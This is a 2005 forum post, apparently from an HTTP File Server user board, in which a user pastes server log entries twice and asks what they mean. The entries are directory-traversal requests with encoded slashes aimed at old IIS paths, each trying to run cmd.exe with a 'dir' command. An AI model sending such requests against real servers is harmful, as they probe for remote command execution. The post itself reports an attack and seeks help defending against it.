76
HFS ~ HTTP File Server / Strange Log Enteries
« on: March 24, 2005, 10:05:57 AM »
.
Can anyone tell me what these HFS log enteries might be about? (I removed the IP address from below).
xx.xxx.xx.xxx:4483 Requested GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4512 Requested GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4520 Requested GET /scripts/..Á?../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4524 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4532 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4540 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4547 Requested GET /scripts/..%2f../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4432 Requested GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4474 Requested GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4520 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
I was online when I got those in a 5 sec period then I shut down the server. The IP address that those came from was from nobody that was logged in. Looks like somebody wanted access to my system through DOS.
Any ideas?
maverick
Can anyone tell me what these HFS log enteries might be about? (I removed the IP address from below).
xx.xxx.xx.xxx:4483 Requested GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4512 Requested GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4520 Requested GET /scripts/..Á?../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4524 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4532 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4540 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4547 Requested GET /scripts/..%2f../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4432 Requested GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4474 Requested GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
xx.xxx.xx.xxx:4520 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
I was online when I got those in a 5 sec period then I shut down the server. The IP address that those came from was from nobody that was logged in. Looks like somebody wanted access to my system through DOS.
Any ideas?
maverick